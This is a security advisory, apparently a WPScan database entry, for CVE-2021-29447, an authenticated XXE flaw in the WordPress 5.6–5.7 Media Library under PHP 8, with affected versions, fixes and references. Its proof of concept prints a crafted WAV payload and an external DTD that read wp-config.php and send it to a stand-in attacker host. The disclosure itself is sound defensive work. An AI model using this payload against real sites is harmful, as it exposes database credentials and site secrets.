logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

WordPress 5.6-5.7 - Authenticated XXE Within the Media Library Affecting PHP 8

Description

A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. WordPress used an audio parsing library called ID3 that was affected by an XML External Entity (XXE) vulnerability affecting PHP versions 8 and above.
This particular vulnerability could be triggered when parsing WAVE audio files.

Proof of Concept

payload.wav:

RIFFXXXXWAVEBBBBiXML<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://attacker-url.domain/xxe.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>>

xxe.dtd:

<!ENTITY % data SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=../wp-config.php">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://attacker-url.domain/?%data;'>">

Affects WordPresses

5.7

Fixed in version 5.7.1

5.6.2

Fixed in version 5.6.3

5.6.1

Fixed in version 5.6.3

5.6

Fixed in version 5.6.3

5.0.11

Fixed in version 5.0.12

References

CVE

CVE-2021-29447

URL

https://wordpress.org/news/2021/04/wordpress-5-7-1-security-and-maintenance-release/

URL

https://core.trac.wordpress.org/changeset/29378

URL

https://blog.wpscan.com/2021/04/15/wordpress-571-security-vulnerability-release.html

URL

https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-rv47-pc52-qrhh

URL

https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/

YouTube Video

Classification

Type

XXE

OWASP top 10

A4: XML External Entities (XXE)

CWE

CWE-611

Miscellaneous

Original Researcher

SonarSource

Verified

Yes

WPVDB ID

cbbe6c17-b24e-4be4-8937-c78472a138b5

Timeline

Publicly Published

2021-04-15 (about 21 days ago)

Added

2021-04-15 (about 21 days ago)

Last Updated

2021-04-28 (about 8 days ago)

Our Other Services

WPScan WordPress Security Plugin